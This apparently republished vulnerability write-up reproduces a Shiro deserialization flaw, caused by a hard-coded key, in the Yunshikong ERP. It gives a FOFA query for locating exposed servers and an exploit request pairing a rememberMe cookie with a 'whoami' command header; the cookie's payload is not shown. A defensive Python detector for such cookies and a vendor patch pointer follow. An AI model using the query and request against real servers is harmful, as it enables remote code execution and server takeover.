Yunshikong (云时空) Socialized Commerce ERP System: Shiro Deserialization Vulnerability Reproduction

news/2024/2/29 3:35:50

0x01 Product Overview

Shikong Cloud Socialized Commerce ERP (Shikong Cloud ERP for short) is written in Java on an Oracle database. It combines the management concepts of UFIDA (用友) software with the particular management needs of pharmaceutical enterprises, standardising each link of the distribution chain to raise competitiveness and lower staffing costs, with the goal of serving the IT build-out of pharmaceutical wholesalers and retail chains. It is a one-stop management system for the pharmaceutical distribution industry that fully meets the latest GSP requirements.

0x02 Vulnerability Overview

The Yunshikong Socialized Commerce ERP system has a Shiro deserialization vulnerability. It stems from a hard-coded Shiro key in the software: an attacker who knows the key can craft malicious serialized data that executes arbitrary code on the server, run system commands or load an in-memory webshell, and thereby take control of the server.

0x03 Reproduction Environment

FOFA: app="云时空社会化商业ERP系统"

0x04 Vulnerability Reproduction

Exp (exploit request)

GET /static/js/public.js HTTP/1.1
Host: your-ip
Cookie: rememberMe=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
X-Token-Data: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
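As an added defensive example (not part of the original write-up or the vendor's code), the following checks inbound requests for the traits of the forged rememberMe cookie described above: a base64 blob far larger than a genuine AES-encrypted Shiro cookie, a length that is not AES block aligned, and the X-Token-Data header the request uses. The size threshold, the header allow-list and the sample requests are assumptions constructed for this example.

```python
import base64

# Assumed thresholds (not from the advisory): a genuine Shiro rememberMe cookie is an
# AES-CBC blob (IV + ciphertext) a few hundred bytes long; forged gadget chains run to KB.
MAX_REMEMBERME_BYTES = 1024
AES_BLOCK = 16
# The advisory's request carries its command in X-Token-Data; extend with any header
# the ERP front end is not known to send.
UNEXPECTED_HEADERS = {"x-token-data"}

# Constructed sample traffic: a benign-sized cookie and an oversized one of zero bytes.
BENIGN_REQUEST = ("GET /static/js/public.js HTTP/1.1\r\nHost: erp.example\r\nCookie: "
                  "JSESSIONID=abc; rememberMe=" + base64.b64encode(b"\x01" * 160).decode() + "\r\n\r\n")
SUSPICIOUS_REQUEST = ("GET /static/js/public.js HTTP/1.1\r\nHost: erp.example\r\nCookie: "
                      "rememberMe=" + base64.b64encode(bytes(4096)).decode() + "\r\n"
                      "X-Token-Data: sample\r\n\r\n")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (path, lower-cased headers, cookie dict)."""
    lines = raw.strip().splitlines()
    path = lines[0].split(" ")[1]
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = dict(p.strip().partition("=")[::2]
                   for p in headers.get("cookie", "").split(";") if "=" in p)
    return path, headers, cookies

def inspect_request(raw):
    """Return the reasons a request looks like a forged Shiro rememberMe cookie."""
    _, headers, cookies = parse_request(raw)
    reasons = []
    cookie = cookies.get("rememberMe")
    if cookie and cookie != "deleteMe":  # Shiro sets deleteMe when decryption fails
        try:
            blob = base64.b64decode(cookie, validate=True)
        except ValueError:  # binascii.Error subclasses ValueError
            reasons.append("rememberMe is not valid base64")
        else:
            if len(blob) % AES_BLOCK:
                reasons.append("rememberMe length is not AES block aligned")
            if len(blob) > MAX_REMEMBERME_BYTES:
                reasons.append(f"rememberMe decodes to {len(blob)} bytes")
    for name in sorted(UNEXPECTED_HEADERS & headers.keys()):
        reasons.append(f"unexpected header {name}")
    return reasons
```

Running `inspect_request` over the two constructed requests returns no reasons for the benign one and two for the suspicious one (oversized cookie, unexpected header); the same checks can be fed from a reverse proxy or WAF log rather than raw requests.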

0x05 Remediation

The vendor has released a fix; contact the vendor to obtain the patch: http://www.ysk360.com/


https://www.xjx100.cn/news/3118766.html